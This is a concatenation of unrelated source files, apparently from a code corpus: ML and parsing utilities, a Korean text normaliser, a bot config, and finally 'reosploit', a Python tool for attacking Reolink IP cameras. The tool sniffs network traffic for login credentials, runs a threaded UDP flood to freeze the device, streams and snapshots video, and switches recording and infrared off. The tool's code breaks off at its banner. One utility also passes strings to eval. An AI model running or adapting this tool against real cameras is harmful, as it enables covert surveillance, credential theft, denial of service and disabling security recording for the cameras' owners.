# model = keras.Model(inputs=inputs, outputs=outputs)
# model.compile(optimizer=tf.train.AdamOptimizer(0.001),
# loss='mse',
# metrics=['mse'])
# model.fit(data, label, epochs=0, batch_size=32,
# validation_data=(val_data, val_label))
# tf.saved_model.simple_save(keras.backend.get_session(),
# "./model",
# inputs={'inputs': inputs},
# outputs={'outputs': outputs})
# pred_label = model.predict(val_data)
# print('pred label: ', pred_label)
# print('val_label: ', val_label)
|
the-stack_106_19121
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from toscaparser.common.exception import ExceptionCollector
from toscaparser.common.exception import InvalidTypeError
from toscaparser.common.exception import UnknownFieldError
from toscaparser.elements.statefulentitytype import StatefulEntityType
from toscaparser.utils.validateutils import TOSCAVersionProperty
class PolicyType(StatefulEntityType):
'''TOSCA built-in policies type.'''
SECTIONS = (DERIVED_FROM, METADATA, PROPERTIES, VERSION, DESCRIPTION, TARGETS) = \
('derived_from', 'metadata', 'properties', 'version',
'description', 'targets')
def __init__(self, ptype, custom_def=None):
super(PolicyType, self).__init__(ptype, self.POLICY_PREFIX,
custom_def)
self.type = ptype
self._validate_keys()
self.meta_data = None
if self.METADATA in self.defs:
self.meta_data = self.defs[self.METADATA]
self._validate_metadata(self.meta_data)
self.properties = None
if self.PROPERTIES in self.defs:
self.properties = self.defs[self.PROPERTIES]
self.parent_policies = self._get_parent_policies()
self.policy_version = None
if self.VERSION in self.defs:
self.policy_version = TOSCAVersionProperty(
self.defs[self.VERSION]).get_version()
self.policy_description = self.defs[self.DESCRIPTION] \
if self.DESCRIPTION in self.defs else None
self.targets_list = None
if self.TARGETS in self.defs:
self.targets_list = self.defs[self.TARGETS]
self._validate_targets(self.targets_list, custom_def)
def _get_parent_policies(self):
policies = {}
parent_policy = self.parent_type
if parent_policy:
while parent_policy != 'tosca.policies.Root':
policies[parent_policy] = self.TOSCA_DEF[parent_policy]
parent_policy = policies[parent_policy]['derived_from']
return policies
@property
def parent_type(self):
'''Return a policy this policy is derived from.'''
return self.derived_from(self.defs)
def get_policy(self, name):
'''Return the definition of a policy field by name.'''
if name in self.defs:
return self.defs[name]
@property
def targets(self):
'''Return targets.'''
return self.targets_list
@property
def description(self):
return self.policy_description
@property
def version(self):
return self.policy_version
def _validate_keys(self):
for key in self.defs.keys():
if key not in self.SECTIONS:
ExceptionCollector.appendException(
UnknownFieldError(what='Policy "%s"' % self.type,
field=key))
def _validate_targets(self, targets_list, custom_def):
for nodetype in targets_list:
if nodetype not in custom_def:
ExceptionCollector.appendException(
InvalidTypeError(what='"%s" defined in targets for '
'policy "%s"' % (nodetype, self.type)))
def _validate_metadata(self, meta_data):
if not meta_data.get('type') in ['map', 'tosca:map']:
ExceptionCollector.appendException(
InvalidTypeError(what='"%s" defined in policy for '
'metadata' % (meta_data.get('type'))))
for entry_schema, entry_schema_type in meta_data.items():
if isinstance(entry_schema_type, dict) and not \
entry_schema_type.get('type') == 'string':
ExceptionCollector.appendException(
InvalidTypeError(what='"%s" defined in policy for '
'metadata "%s"'
% (entry_schema_type.get('type'),
entry_schema)))
|
the-stack_106_19123
|
"""Utility functions."""
import inspect
import logging
from typing import Any, List, Optional, cast, Iterable, Set, Dict
from homebot.validator import is_iterable_but_no_str
def make_list(value: Any, null_empty: bool = True) -> Optional[List[Any]]:
"""
Makes a list out of the given value. If value is a list, nothing is changed.
If value is an iterable (but no str), it will be converted to a list. If list is
either a list nor an iterable it will be converted to a single element list.
If value is None and null_empty is True an empty list will returned; if null_empty
is False None will be returned.
Example:
>>> make_list(['list'])
['list']
>>> make_list(('t1', 't2'))
['t1', 't2']
>>> make_list('element')
['element']
>>> make_list(None)
[]
>>> print(make_list(None, null_empty=False))
None
"""
if isinstance(value, list):
return value
if is_iterable_but_no_str(value):
return list(value)
if value is None:
return [] if null_empty else None
return [value]
def interpolate(format_: str, **context: Any) -> str:
"""
Dynamically interpolates a format by using a given context.
Example:
>>> interpolate('{payload}', payload=12)
'12'
>>> interpolate('{payload.upper()}', payload="a")
'A'
>>> interpolate('{(a - b):0.2f}', a=10, b=4.999)
'5.00'
"""
return cast(str, eval(f'f{format_!r}', None, context)) # pylint: disable=eval-used
def interpolate_complex(cplx: Any, **context: Any) -> Any:
"""
f-String interpolates a complex structure (like a dict or list).
Examples:
>>> dut = interpolate_complex
>>> dut("{number}", number=42) # str
'42'
>>> dut(["{one}", "{two}"], one=1, two=2) # list
['1', '2']
>>> dut(("{one}", "{two}"), one=1, two=2) # tuple
['1', '2']
>>> dut({'one': '{one}', '{two}': 'two'}, one=1, two=2) # dict
{'one': '1', '2': 'two'}
>>> dut({'one': '{one}', '{two}': ["{one}", "{two}"]}, one=1, two=2) # complex
{'one': '1', '2': ['1', '2']}
>>> dut(42, one=1, two=2) # none of the above -> as is
42
"""
# pylint: disable=invalid-name
def i(c: Any) -> Any:
if isinstance(c, dict):
return {i(k): i(v) for k, v in c.items()}
if is_iterable_but_no_str(c):
return [i(item) for item in c]
if isinstance(c, str):
return interpolate(c, **context)
return c
# pylint: enable=invalid-name
return i(cplx)
class classproperty(property): # pylint: disable=invalid-name
"""
Decorator classproperty:
Make class methods look like read-only class properties.
Writing to that classproperty will not do what you expect ;-)
Examples:
>>> class Foo(object):
... _instance = 5
... @classproperty
... def my_prop(cls):
... return cls._instance
>>> Foo.my_prop
5
>>> Foo._instance
5
>>> Foo._instance = 15
>>> Foo.my_prop
15
>>> Foo.my_prop = 10
>>> Foo._instance
15
"""
def __get__(self, cls, owner): # type: ignore
return classmethod(self.fget).__get__(None, owner)()
class AutoStrMixin:
"""
Magically adds __str__ and __repr__ methods containing non-ignored fields.
Example:
>>> class Magic(AutoStrMixin):
... __ignore_fields__ = ['c']
... def __init__(self):
... self.a = 42
... self.b = 'abc'
... self.c = 42.42
>>> class MoreMagic(Magic):
... __ignore_fields__ = ['e']
... def __init__(self):
... super().__init__()
... self.d = 'd'
... self.e = 'e'
>>> dut = Magic()
>>> str(dut)
"Magic(a=42, b='abc')"
>>> repr(dut)
"Magic(a=42, b='abc')"
>>> mm = MoreMagic()
>>> str(mm)
"MoreMagic(a=42, b='abc', d='d')"
"""
@classmethod
def __ignore(cls) -> Set[str]:
clz = cls
field_name = '__ignore_fields__'
res: Set[str] = set()
for clazz in inspect.getmro(clz):
values_ = getattr(clazz, field_name, None)
if values_ is not None:
res = res.union(set(cast(Iterable[str], make_list(values_))))
return res
def __str__(self) -> str:
items = [
"{name}={value}".format(
name=name,
value=vars(self)[name].__repr__()
) for name in sorted(vars(self))
if name not in self.__ignore()
]
return "{clazz}({items})".format(
clazz=str(type(self).__name__),
items=', '.join(items)
)
def __repr__(self) -> str:
return str(self)
class LogMixin:
"""
Adds a logger property to the class to provide easy access to a configured logging instance to
use.
Example:
>>> class NeedsLogger(LogMixin):
... def do(self, message):
... self.logger.info(message)
>>> dut = NeedsLogger()
>>> dut.do('mymessage')
"""
@classproperty
def logger(cls: Any) -> logging.Logger: # pylint: disable=no-self-argument
"""
Configures and returns a logger instance for further use.
Returns:
(logging.Logger)
"""
component = "{}.{}".format(cls.__module__, cls.__name__) # pylint: disable=no-member
return logging.getLogger(component)
class Singleton(type):
"""
Metaclass for singleton classes.
Examples:
>>> class Magic(metaclass=Singleton):
... pass
>>> Magic() is Magic()
True
"""
_instances: Dict[type, type] = {}
def __call__(cls, *args: Any, **kwargs: Any) -> type:
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
|
the-stack_106_19125
|
""" This module defines the constants or default values.
"""
from pydantic import BaseModel, validator
from watermark import Position
class Config(BaseModel):
watermark: str = "https://drive.google.com/file/d/1MuBCyPkasHcQ-h-LW4zYaWtAGgGqjQxV/view?usp=sharing"
frame_rate: int = 15
preset: str = "ultrafast"
position: Position = Position.centre
@validator("preset")
def validate_preset(val):
allowed = ["ultrafast", "fast", "medium", "slow"]
if not val in allowed:
raise ValueError(f"Choose preset from {allowed}")
return val
START = """I am alive!"""
HELP = """
Using the bot is very simple. Just send a photo, video or gif to the bot. The bot will reply with the watermarked media.
The bot commands `/set` and `/get` can set and get the value of the configuration variables. The commands are simple and intuitive. The bot will show you the usage if you send an incorrect argument.
Syntax for `/set` ➜ `/set key: value`
Syntax for `/get` ➜ `/get key`
"""
COMMANDS = {
"start": "start the bot or check if alive",
"set": "set the value for a config variable",
"get": "know the value of a config variable",
"help": "learn how to use the bot",
}
config = Config()
|
the-stack_106_19128
|
# coding: utf-8
# Code based on
import re
import os
import ast
import json
from jamo import hangul_to_jamo, h2j, j2h
from .ko_dictionary import english_dictionary, etc_dictionary
PAD = '_'
EOS = '~'
PUNC = '!\'(),-.:;?'
SPACE = ' '
JAMO_LEADS = "".join([chr(_) for _ in range(0x1100, 0x1113)])
JAMO_VOWELS = "".join([chr(_) for _ in range(0x1161, 0x1176)])
JAMO_TAILS = "".join([chr(_) for _ in range(0x11A8, 0x11C3)])
VALID_CHARS = JAMO_LEADS + JAMO_VOWELS + JAMO_TAILS + PUNC + SPACE
ALL_SYMBOLS = PAD + EOS + VALID_CHARS
char_to_id = {c: i for i, c in enumerate(ALL_SYMBOLS)}
id_to_char = {i: c for i, c in enumerate(ALL_SYMBOLS)}
quote_checker = """([`"'"“‘])(.+?)([`"'"”’])"""
def is_lead(char):
return char in JAMO_LEADS
def is_vowel(char):
return char in JAMO_VOWELS
def is_tail(char):
return char in JAMO_TAILS
def get_mode(char):
if is_lead(char):
return 0
elif is_vowel(char):
return 1
elif is_tail(char):
return 2
else:
return -1
def _get_text_from_candidates(candidates):
if len(candidates) == 0:
return ""
elif len(candidates) == 1:
return _jamo_char_to_hcj(candidates[0])
else:
return j2h(**dict(zip(["lead", "vowel", "tail"], candidates)))
def jamo_to_korean(text):
text = h2j(text)
idx = 0
new_text = ""
candidates = []
while True:
if idx >= len(text):
new_text += _get_text_from_candidates(candidates)
break
char = text[idx]
mode = get_mode(char)
if mode == 0:
new_text += _get_text_from_candidates(candidates)
candidates = [char]
elif mode == -1:
new_text += _get_text_from_candidates(candidates)
new_text += char
candidates = []
else:
candidates.append(char)
idx += 1
return new_text
num_to_kor = {
'0': '영',
'1': '일',
'2': '이',
'3': '삼',
'4': '사',
'5': '오',
'6': '육',
'7': '칠',
'8': '팔',
'9': '구',
}
unit_to_kor1 = {
'%': '퍼센트',
'cm': '센치미터',
'mm': '밀리미터',
'km': '킬로미터',
'kg': '킬로그람',
}
unit_to_kor2 = {
'm': '미터',
}
upper_to_kor = {
'A': '에이',
'B': '비',
'C': '씨',
'D': '디',
'E': '이',
'F': '에프',
'G': '지',
'H': '에이치',
'I': '아이',
'J': '제이',
'K': '케이',
'L': '엘',
'M': '엠',
'N': '엔',
'O': '오',
'P': '피',
'Q': '큐',
'R': '알',
'S': '에스',
'T': '티',
'U': '유',
'V': '브이',
'W': '더블유',
'X': '엑스',
'Y': '와이',
'Z': '지',
}
def compare_sentence_with_jamo(text1, text2):
return h2j(text1) != h2j(text2)
def tokenize(text, as_id=False):
# jamo package에 있는 hangul_to_jamo를 이용하여 한글 string을 초성/중성/종성으로 나눈다.
text = normalize(text)
tokens = list(hangul_to_jamo(text)) # '존경하는' --> ['ᄌ', 'ᅩ', 'ᆫ', 'ᄀ', 'ᅧ', 'ᆼ', 'ᄒ', 'ᅡ', 'ᄂ', 'ᅳ', 'ᆫ', '~']
if as_id:
return [char_to_id[token] for token in tokens] + [char_to_id[EOS]]
else:
return [token for token in tokens] + [EOS]
def tokenizer_fn(iterator):
return (token for x in iterator for token in tokenize(x, as_id=False))
def normalize(text):
text = text.strip()
text = re.sub('\(\d+일\)', '', text)
text = re.sub('\([⺀-⺙⺛-⻳⼀-⿕々〇〡-〩〸-〺〻㐀-䶵一-鿃豈-鶴侮-頻並-龎]+\)', '', text)
text = normalize_with_dictionary(text, etc_dictionary)
text = normalize_english(text)
text = re.sub('[a-zA-Z]+', normalize_upper, text)
text = normalize_quote(text)
text = normalize_number(text)
return text
def normalize_with_dictionary(text, dic):
if any(key in text for key in dic.keys()):
pattern = re.compile('|'.join(re.escape(key) for key in dic.keys()))
return pattern.sub(lambda x: dic[x.group()], text)
else:
return text
def normalize_english(text):
def fn(m):
word = m.group()
if word in english_dictionary:
return english_dictionary.get(word)
else:
return word
text = re.sub("([A-Za-z]+)", fn, text)
return text
def normalize_upper(text):
text = text.group(0)
if all([char.isupper() for char in text]):
return "".join(upper_to_kor[char] for char in text)
else:
return text
def normalize_quote(text):
def fn(found_text):
from nltk import sent_tokenize # NLTK doesn't along with multiprocessing
found_text = found_text.group()
unquoted_text = found_text[1:-1]
sentences = sent_tokenize(unquoted_text)
return " ".join(["'{}'".format(sent) for sent in sentences])
return re.sub(quote_checker, fn, text)
number_checker = "([+-]?\d[\d,]*)[\.]?\d*"
count_checker = "(시|명|가지|살|마리|포기|송이|수|톨|통|점|개|벌|척|채|다발|그루|자루|줄|켤레|그릇|잔|마디|상자|사람|곡|병|판)"
def normalize_number(text):
text = normalize_with_dictionary(text, unit_to_kor1)
text = normalize_with_dictionary(text, unit_to_kor2)
text = re.sub(number_checker + count_checker,
lambda x: number_to_korean(x, True), text)
text = re.sub(number_checker,
lambda x: number_to_korean(x, False), text)
return text
num_to_kor1 = [""] + list("일이삼사오육칠팔구")
num_to_kor2 = [""] + list("만억조경해")
num_to_kor3 = [""] + list("십백천")
# count_to_kor1 = [""] + ["하나","둘","셋","넷","다섯","여섯","일곱","여덟","아홉"]
count_to_kor1 = [""] + ["한", "두", "세", "네", "다섯", "여섯", "일곱", "여덟", "아홉"]
count_tenth_dict = {
"십": "열",
"두십": "스물",
"세십": "서른",
"네십": "마흔",
"다섯십": "쉰",
"여섯십": "예순",
"일곱십": "일흔",
"여덟십": "여든",
"아홉십": "아흔",
}
def number_to_korean(num_str, is_count=False):
if is_count:
num_str, unit_str = num_str.group(1), num_str.group(2)
else:
num_str, unit_str = num_str.group(), ""
num_str = num_str.replace(',', '')
# print("before ast : ", num_str, "dtype : ",type(num_str))
try:
num = ast.literal_eval(num_str)
# print("After ast :", num,"dtype : ",type(num))
except Exception:
num_str = re.sub('^0+', '', num_str)
num = ast.literal_eval(num_str)
if num == 0:
return "영"
check_float = num_str.split('.')
if len(check_float) == 2:
digit_str, float_str = check_float
elif len(check_float) >= 3:
raise Exception(" [!] Wrong number format")
else:
digit_str, float_str = check_float[0], None
if is_count and float_str is not None:
raise Exception(" [!] `is_count` and float number does not fit each other")
digit = int(digit_str)
if digit_str.startswith("-"):
digit, digit_str = abs(digit), str(abs(digit))
kor = ""
size = len(str(digit))
tmp = []
for i, v in enumerate(digit_str, start=1):
v = int(v)
if v != 0:
if is_count:
tmp += count_to_kor1[v]
else:
tmp += num_to_kor1[v]
tmp += num_to_kor3[(size - i) % 4]
if (size - i) % 4 == 0 and len(tmp) != 0:
kor += "".join(tmp)
tmp = []
try:
kor += num_to_kor2[int((size - i) / 4)]
except:
print(f'IndexError: {digit_str}')
pass
if is_count:
if kor.startswith("한") and len(kor) > 1:
kor = kor[1:]
if any(word in kor for word in count_tenth_dict):
kor = re.sub(
'|'.join(count_tenth_dict.keys()),
lambda x: count_tenth_dict[x.group()], kor)
if not is_count and kor.startswith("일") and len(kor) > 1:
kor = kor[1:]
if float_str is not None:
kor += "쩜 "
kor += re.sub('\d', lambda x: num_to_kor[x.group()], float_str)
if num_str.startswith("+"):
kor = "플러스 " + kor
elif num_str.startswith("-"):
kor = "마이너스 " + kor
return kor + unit_str
if __name__ == "__main__":
def test_normalize(text):
print(text)
print(normalize(text))
print("=" * 30)
test_normalize("JTBC는 JTBCs를 DY는 A가 Absolute")
test_normalize("오늘(13일) 3,600마리 강아지가")
test_normalize("60.3%")
test_normalize('"저돌"(猪突) 입니다.')
test_normalize('비대위원장이 지난 1월 이런 말을 했습니다. “난 그냥 산돼지처럼 돌파하는 스타일이다”')
test_normalize("지금은 -12.35%였고 종류는 5가지와 19가지, 그리고 55가지였다")
test_normalize("JTBC는 TH와 K 양이 2017년 9월 12일 오후 12시에 24살이 된다")
print(list(hangul_to_jamo(list(hangul_to_jamo('비대위원장이 지난 1월 이런 말을 했습니다? “난 그냥 산돼지처럼 돌파하는 스타일이다”')))))
|
the-stack_106_19129
|
# -*- coding: utf-8 -*-
from datetime import datetime
from parser import Model
from parser.cmds.cmd import CMD
from parser.utils.corpus import Corpus
from parser.utils.data import TextDataset, batchify
class Predict(CMD):
def add_subparser(self, name, parser):
subparser = parser.add_parser(
name, help='Use a trained model to make predictions.'
)
subparser.add_argument('--batch-size', default=5000, type=int,
help='batch size')
subparser.add_argument('--fdata', default='data/ptb/test.conllx',
help='path to dataset')
subparser.add_argument('--fpred', default='pred.conllx',
help='path to predicted result')
return subparser
def __call__(self, args):
super(Predict, self).__call__(args)
print("Load the dataset")
corpus = Corpus.load(args.fdata, self.fields)
dataset = TextDataset(corpus, [self.WORD, self.FEAT])
# set the data loader
dataset.loader = batchify(dataset, args.batch_size)
print(f"{len(dataset)} sentences, "
f"{len(dataset.loader)} batches")
print("Load the model")
self.model = Model.load(args.model)
print(f"{self.model}\n")
print("Make predictions on the dataset")
start = datetime.now()
corpus.heads, corpus.rels = self.predict(dataset.loader)
print(f"Save the predicted result to {args.fpred}")
corpus.save(args.fpred)
total_time = datetime.now() - start
print(f"{total_time}s elapsed, "
f"{len(dataset) / total_time.total_seconds():.2f} Sents/s")
|
the-stack_106_19131
|
#!/bin/env python3
import requests
import json
import sys
import os
from colorama import Fore, init, Back, Style
init()
import socket
import random
import netaddr
import pyshark
import argparse
import threading
from queue import Queue
import time
import cv2
from scapy.all import *
from prettytable import PrettyTable, DEFAULT
actionchoices = ['scan', 'listen', 'token', 'enumerate', 'snap', 'dos', 'stream', 'infared', 'recording']
def setargs():
global args
parser = argparse.ArgumentParser(description='Exploit Reolink Cameras.')
parser.add_argument('--ip', help="IP of Target Reolink Camera", type=str)
parser.add_argument('--action', choices=actionchoices, help='''Action to do.''')
parser.add_argument('-u', help="Username to Authenticate on Camera", type=str)
parser.add_argument('-p', help="Password to Authenticate on Camera", type=str)
parser.add_argument('-i', help="Network iFace to use if listening.", type=str)
parser.add_argument('-t', help="Threads to use when needed.", type=int, default=50)
args = parser.parse_args()
if not args.ip or not args.action:
print("Error: Please specify an IP and Action! (E.g, ./reosploit.py --ip 192.168.1.10 --action dos)\n")
x = PrettyTable()
x.field_names = ["Action", "Description", "Category", "Authentication"]
# Enumeration
info(Style.BRIGHT + "Actions For Enumeration." + Style.RESET_ALL)
x.add_row(["Scan", "Discover local Reolink Devices.", "Enumeration", f"{Fore.RED}No{Fore.RESET}"])
x.add_row(["Listen", "Listen for Reolink Related Network Traffic.", "Enumeration", f"{Fore.RED}No{Fore.RESET}"])
x.add_row(["Enumerate", "Fully Enumerate information about the device..", "Enumeration", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.align = 'l'; x.set_style(DEFAULT)
print(x, "\n")
# Exploitation
x = PrettyTable()
x.field_names = ["Action", "Description", "Category", "Authentication"]
info(Style.BRIGHT + "Actions For Exploitation." + Style.RESET_ALL)
x.add_row(["Token", "Generate an API Authentication Token using Credentials.", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Snap", "Take a Photo through the Camera using the API.", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Stream", "Use CV2 + RTSP To Stream the Device's Video Feed", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Dos", "Significantly slow down or freeze the device.", "Exploitation", f"{Fore.RED}No{Fore.RESET}"])
x.add_row(["Infared", "Toggle the Infared Capabilities.", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.add_row(["Recording", "Toggle the Recording Capabilities", "Exploitation", f"{Fore.GREEN}Yes{Fore.RESET}"])
x.align = 'l'; x.set_style(DEFAULT)
print(x)
sys.exit()
def info(message):
print(Style.BRIGHT + cyan + '[+] ' + Style.RESET_ALL + message)
def scan():
info("Scanning " + str(len(ips)) + " potential Hosts...")
def probe(ip):
try:
r = requests.get('http://' + str(ip))
if "<title id=appTitle>Reolink</title>" in r.text:
mac = getmacbyip(str(ip))
info("Found Reolink Device: " + str(ip) + " -- " + mac)
else:
pass
except requests.exceptions.ConnectionError:
pass
try:
def threader():
while True:
worker = q.get()
probe(worker)
q.task_done()
q = Queue()
for a in range(args.t):
t = threading.Thread(target=threader)
t.daemon = True
t.start()
for worker in ips:
q.put(worker)
q.join()
except Exception as e:
info("Unforseen Error: " + e)
print("")
info("Finished!")
def listen():
if not args.i:
info('If you are listening, please specify a Network iFace to use!')
sys.exit()
info('Listening for Reolink Traffic on ' + args.i + '...')
capture = pyshark.LiveCapture(interface=args.i, use_json=True, display_filter=f"http && ip.dst == {args.ip} or ip.src == {args.ip}")
while True:
for packet in capture.sniff_continuously(packet_count=100):
# SESSION DECLARTATION
try:
username = packet['json'].array.object[0].member[2]
info('Found Active HTTP Session')
print('Client: ' + packet['ip'].dst)
print('User: ' + username)
except KeyError:
pass
except TypeError:
pass
# LOGIN SEQUENCE
try:
if '/api.cgi?cmd=Login' in str(packet.http):
info('Found Login HTTP Request')
username = packet['json'].array.object.member[2].object.member.object.member[0].string
passw = packet['json'].array.object.member[2].object.member.object.member[1].string
print('Client: ' + packet['ip'].src)
print('Login: ' + username + ':' + passw)
except KeyError:
pass
def gettoken(ip):
if not args.u or not args.p:
info('A Username & Password for Authentication is Required for generating a Token!')
sys.exit()
username = args.u
passw = args.p
info("Generating a Token from " + ip + " for " + username + ":" + passw + "...")
r = requests.post("http://" + ip + "/cgi-bin/api.cgi?cmd=Login&token=null", json=[{"cmd":"Login","action":0,"param":{"User":{"userName":username,"password":passw}}}])
try:
token = json.loads(r.text)[0]["value"]["Token"]["name"]
except KeyError:
info('Authentication Error.')
sys.exit()
return token
def numberboolean(number):
if number == 0 or number == 6:
return green + Style.BRIGHT + "Yes" + Fore.RESET + Style.RESET_ALL
else:
return Fore.RED + Style.BRIGHT + "No" + Fore.RESET + Style.RESET_ALL
def enumerate():
info('Getting Token To Authenticate To Fully Enumerate...')
token = gettoken(args.ip)
info('Requesting Information...')
data = [{"cmd":"GetAbility","action":0,"param":{"User":{"userName":args.u}}},{"cmd":"GetNetPort","action":0,"param":{}},{"cmd":"GetDevInfo","action":0,"param":{}},{"cmd":"GetLocalLink","action":0,"param":{}},{"cmd":"GetUser","action":0,"param":{}}]
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?token=" + token, json=data)
jsondata = json.loads(r.content)
info("Getting List Of Users...")
payload = [{"cmd":"GetUser","action":0,"param":{}}]
usersjson = json.loads(requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetUser&token=" + token, json=payload).text)
info("Getting Storage Information...")
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetHddInfo&token=" + token, json=[{"cmd":"GetHddInfo","action":0,"param":{}}])
hddjson = json.loads(r.content)
info("Successfully Recieved Information!")
print(Style.BRIGHT + """
INFORMATION """ + Fore.BLUE + """[Device: """ + args.ip + """]
""" + Fore.RESET + Style.RESET_ALL)
print("IP: " + args.ip)
print("MAC: " + jsondata[3]["value"]["LocalLink"]["mac"])
print("Name: " + jsondata[2]["value"]["DevInfo"]["name"])
print("Model: " + jsondata[2]["value"]["DevInfo"]["model"])
print("Firmware: " + jsondata[2]["value"]["DevInfo"]["firmVer"])
print(Style.BRIGHT + """
PRIVELEGE CHECK """ + Fore.BLUE + """[User: """ + args.u + """]
""" + Style.RESET_ALL + Fore.RESET)
print("Can Use WiFi? " + numberboolean(jsondata[0]["value"]["Ability"]["wifi"]["permit"]))
print("Can Take Recordings? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["videoClip"]["permit"]))
print("Can Take Photos? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["snap"]["permit"]))
print("Can Download Recordings? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["recDownload"]["permit"]))
print("Can Modify/View FTP Options? " + numberboolean(jsondata[0]["value"]["Ability"]["abilityChn"][0]["ftp"]["permit"]))
print("Can Modify/View EMail Options? " + numberboolean(jsondata[0]["value"]["Ability"]["email"]["permit"]))
print("Can Stream from RTSP? " + numberboolean(jsondata[0]["value"]["Ability"]["rtsp"]["permit"]))
print("Can Stream from RTMP? " + numberboolean(jsondata[0]["value"]["Ability"]["rtmp"]["permit"]))
print("Can Reboot? " + numberboolean(jsondata[0]["value"]["Ability"]["reboot"]["permit"]))
print(Style.BRIGHT + """
REGISTERED USERS """ + Fore.BLUE + """[Visible To: """ + args.u + """]
""" + Fore.RESET + Style.RESET_ALL)
for user in usersjson[0]["value"]["User"]:
print("Username: " + user["userName"])
print("Privelege Level: " + user["level"])
print(Style.BRIGHT + """
STORAGE INFORMATION """ + Fore.BLUE + """[Visible To: """ + args.u + """]
""" + Fore.RESET + Style.RESET_ALL)
for hdd in hddjson[0]["value"]["HddInfo"]:
print("Mount: " + str(hdd["mount"]))
print("Capacity: " + str(hdd["capacity"] / 1000) + "GB")
print("Used Storage: " + str(hdd["size"] / 1000) + "GB")
print("\n")
def snap():
info('Getting Token To Authenticate To Get Snapshot...')
token = gettoken(args.ip)
info('Requesting photo...')
r = requests.get('http://' + args.ip + '/cgi-bin/api.cgi?cmd=Snap&channel=0&token=' + token)
if r.status_code == 200:
info('Successfully Snapped a Photo!')
with open('/tmp/snap.jpg', 'wb') as o:
o.write(r.content)
o.close()
info('Photo saved to /tmp/snap.jpg')
else:
info('Unknown Status Code, presuming the Snapshot failed...')
def dos():
print(Style.BRIGHT + Fore.YELLOW + "WARNING:" + Style.RESET_ALL + " THIS ATTACK WILL SLOW DOWN THE CAMERA AND BE VERY OBVIOUS, PLEASE TAKE CAUTION!")
info("Preparing for DOS...")
ip = args.ip
ports = [80, 443, 554]
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#info("Making Bogus Data...")
bogusdata = random._urandom(64900)
info("Starting DOS In 5 Seconds...")
time.sleep(5)
print("")
info("Starting DOS...")
print("Press CNTRL + C At Anytime to Stop the Attack.")
try:
def dosprint():
while True:
dots = 4
for dotcount in range(dots):
print("\r DOSing " + ip + " [-]", end='', flush=True)
time.sleep(0.3)
print("\r DOSing " + ip + " [\]", end='', flush=True)
time.sleep(0.3)
print("\r DOSing " + ip + " [|]", end='', flush=True)
time.sleep(0.3)
print("\r DOSing " + ip + " [/]", end='', flush=True)
time.sleep(0.3)
ta = threading.Thread(target=dosprint)
ta.daemon = True
ta.start()
def senddos(port):
while True:
s.sendto(bogusdata, (ip,port))
def threader():
while True:
worker = q.get()
senddos(worker)
q.task_done()
q = Queue()
for a in range(args.t):
t = threading.Thread(target=threader)
t.daemon = True
t.start()
for worker in ports:
q.put(worker)
q.join()
except KeyboardInterrupt:
print("")
info("Stopping...")
sys.exit()
def stream():
if not args.u or not args.p:
info('A Username & Password for Authentication is Required for Streaming Video!')
sys.exit()
info("Attempting to Stream Through RTSP...")
print("Press CNTRL + C At Anytime to Stop the Stream.")
cap = cv2.VideoCapture(f"rtsp://{args.u}:{args.p}@{args.ip}")
try:
while(cap.isOpened()):
ret, frame = cap.read()
frame = cv2.resize(frame, (900, 900))
cv2.imshow(f'ReoSploit Stream @ {args.ip}', frame)
if cv2.waitKey(20) & 0xFF == ord('q'):
break
except KeyboardInterrupt:
pass
cap.release()
cv2.destroyAllWindows()
def infared():
info('Getting Token To Authenticate To Toggle Infared...')
token = gettoken(args.ip)
info("Getting Infared State...")
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetIrLights&token=" + token, json=[{"cmd":"GetIrLights","action":0,"param":{"channel":0}}])
state = json.loads(r.text)[0]["value"]["IrLights"]["state"]
if state == "Auto":
info("IR Lights are ON. Turning Off...")
action = "Off"
elif state == "Off":
info("IR Lights are OFF. Turning On...")
action = "Auto"
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?token=" + token, json=[{"cmd":"SetIrLights","param":{"IrLights":{"channel":0,"state":action}},"action":0}])
if json.loads(r.text)[0]["value"]["rspCode"] == 200:
info("Successfully Changed the IR Light Options!")
else:
info("Failed. Error Code:", json.loads(r.text)[0]["value"]["rspCode"])
sys.exit()
def recording():
info('Getting Token To Authenticate To Toggle Recording...')
token = gettoken(args.ip)
info("Getting Recording State...")
r = requests.post("http://" + args.ip + "/cgi-bin/api.cgi?cmd=GetRec&token=" + token, json=[{"cmd":"GetRec","action":0,"param":{"channel":0}}])
state = json.loads(r.text)[0]["value"]["Rec"]["schedule"]["enable"]
if state == 1:
info("Recording is ON. Turning Off...")
action = 0
elif state == 0:
info("Recording is OFF. Turning On...")
action = 1
r = requests.post(" http://192.168.1.120/cgi-bin/api.cgi?cmd=SetRec&token=" + token, json=[{"cmd":"SetRec","action":0,"param":{"Rec":{"schedule":{"enable":action}}}}])
if json.loads(r.text)[0]["value"]["rspCode"] == 200:
info("Successfully Changed the Recording Options!")
else:
info("Failed. Error Code:", json.loads(r.text)[0]["value"]["rspCode"])
sys.exit()
if os.geteuid() != 0:
info('Please run this as ROOT!')
sys.exit()
def clear():
os.system('clear')
clear()
green = '\u001b[38;5;118m'
yellow = '\u001b[38;5;220m'
cyan = '\u001b[38;5;51m'
banner = fr'''
